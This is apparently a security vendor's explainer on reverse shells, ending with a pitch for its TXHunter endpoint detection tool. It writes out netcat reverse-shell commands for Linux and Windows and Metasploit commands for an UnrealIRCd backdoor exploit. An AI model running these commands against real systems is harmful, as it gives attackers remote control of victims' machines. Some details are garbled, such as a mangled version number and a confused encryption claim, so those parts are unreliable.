Reverse shell is a kind of “virtual” shell that is initiated from a victim’s computer to connect with attacker’s computer. Once the connection is established, it allows attacker to send over commands to execute on the victim’s computer and to get results back. The attacker can execute any command/program on the victim’s computer at the same privilege as the current login user who initiated the connection.
Reverse shell connection is usually established via TCP protocol, but it has also been seen via ICMP protocol. The connection can be made through any port, for example, through port 80 and 443. This makes it difficulty for firewall and other network parameter security solutions to detect and block since they are usually allowed to be open by default. When it uses port 443 (SSL), network content cannot be inspected easily since it is encrypted.
Reverse shell connection can be initiated from a victim's computer by executing many different built in system applications, such as bash, telnet, netcat, perl script, python script, php script, etc. The connection initiation can be carried out by standalone script or embedded programs, as long as the attacker can get access to the victim computer system.
Attacker gets onto a victim’s computer, mostly through application or system vulnerability exploitation, or malware infection. Once the victim’s system is comprised, reverse shell connection can be initiated easily. Reverse shell is an ideal choice for attacker to plant a backdoor on the comprised computer.
Establish Reverse Shell
For illustration purpose, let’s have two Linux systems, one is at 192.168.1.19 as attacker, and the other is at 192.168.1.17 as victim.
From attacker’s system, set it up to listen on a port, for example, port 4444, by executing the follow command:
nc -lvp 4444
It started Netcat listening on port 4444. You can also use any other port, such as port 80 or 443 that are most likely allowed to open by firewalls.
From victim’s computer, execute the following command to connect attacker’s system:
nc 192.168.1.19 4444 -e /bin/bash
If run Windows, use cmd.exe as shell,
nc.exe 192.168.1.19 4444 -e cmd.exe
One can also use many other different ways to initiate connection to attacker’s system:
Those commands can be launch at command line console, but they can also be embedded into an application file. When the application runs, the reverse shell connection is initiated.
Detect Reverse Shell
In order to initiate reverse shell connection from a victim’s system, attacker needs to get access to the victim’s system to execute the reverse shell initiation code. This can be achieved by trigging user to execute a malware program file or through system vulnerability exploitation.
For demo purpose, let’s set up a Linux systems as victim computer at 192.168.207.131, running the service UnreadlIRCD version 188.8.131.52. This version of UnrealIRCD contains vulnerability that allows a person to execute any command with the privileges of the user who starts the IRC service. Now, let’s start Kali Linux, execute the following 3 commands: “use exploit/unix/irc/ureal_ircd_3281_backdoor”, “set host 192.168.207.131”, “exploit”. After the “exploit” command successes, the attacker has obtained the reverse shell connecting to the victim’s system. The attacker very much controls the victim’s system, executes any command or runs any program on the victim’s system at the same privilege of the user who initiated the connection. Detecting reverse shell attack can be difficulty for Firewall when the connection is made via known open ports, such as port 80, and its traffic data cannot be encrypted if it uses secure port, like 443.
However, detecting reverse shell attack can be easier from endpoint side. There are certain behaviors and characteristics existed in the process that established reverse shell, which are different from other normal processes. TXHunter’s disposable agent runs on the victim computer, collecting process’s behavior and characteristics, analyzing it and detecting reverse shell attacks. The following lists its hunting result of detecting reverse shell attack, where you can see the attacking sequence along with processes and time. For details, download whitepaper at https://triagingx.com/resources#2